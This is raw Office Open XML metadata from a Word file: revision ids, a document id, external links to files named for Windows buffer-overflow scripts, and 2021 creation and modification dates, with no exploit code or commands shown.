    <w:rsid w:val="006C08BD"/>
    <w:rsid w:val="006C4CEE"/>
    <w:rsid w:val="006F4411"/>
    <w:rsid w:val="00794DB7"/>
    <w:rsid w:val="007E14BE"/>
    <w:rsid w:val="00817E79"/>
    <w:rsid w:val="008B0EA8"/>
    <w:rsid w:val="008B508E"/>
    <w:rsid w:val="009265D1"/>
    <w:rsid w:val="0093217C"/>
    <w:rsid w:val="00937C12"/>
    <w:rsid w:val="00957256"/>
    <w:rsid w:val="00970A0B"/>
    <w:rsid w:val="00980E97"/>
    <w:rsid w:val="009D7850"/>
    <w:rsid w:val="009F0A3A"/>
    <w:rsid w:val="009F3946"/>
    <w:rsid w:val="009F515A"/>
    <w:rsid w:val="00A000B6"/>
    <w:rsid w:val="00A93CF0"/>
    <w:rsid w:val="00AD1606"/>
    <w:rsid w:val="00AE1480"/>
    <w:rsid w:val="00B015A4"/>
    <w:rsid w:val="00B03227"/>
    <w:rsid w:val="00B500D2"/>
    <w:rsid w:val="00B8014A"/>
    <w:rsid w:val="00B92BFE"/>
    <w:rsid w:val="00BC790D"/>
    <w:rsid w:val="00BE3F69"/>
    <w:rsid w:val="00C74149"/>
    <w:rsid w:val="00C9512F"/>
    <w:rsid w:val="00D07F72"/>
    <w:rsid w:val="00D56040"/>
    <w:rsid w:val="00D914C0"/>
    <w:rsid w:val="00DA1D2E"/>
    <w:rsid w:val="00E16CEE"/>
    <w:rsid w:val="00E172F3"/>
    <w:rsid w:val="00E56FD9"/>
    <w:rsid w:val="00E63B32"/>
    <w:rsid w:val="00E75B17"/>
    <w:rsid w:val="00F14898"/>
    <w:rsid w:val="00F14B62"/>
    <w:rsid w:val="00F368ED"/>
    <w:rsid w:val="00F72100"/>
    <w:rsid w:val="00FD3C66"/>
    <w:rsid w:val="00FE5CBD"/>
    <w:rsid w:val="00FF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ACDE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F404AA60-D99B-4444-9CCB-8D663908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B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5B1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44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4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4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44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44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4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4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uffer%20overflow/windows/fixed_buffer_flow.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buffer%20overflow/windows/windows_overflow_check.p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buffer%20overflow/windows/final.py" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.e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buffer%20overflow/windows/BAD_CHARACT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2021-04-25T06:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-07T20:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>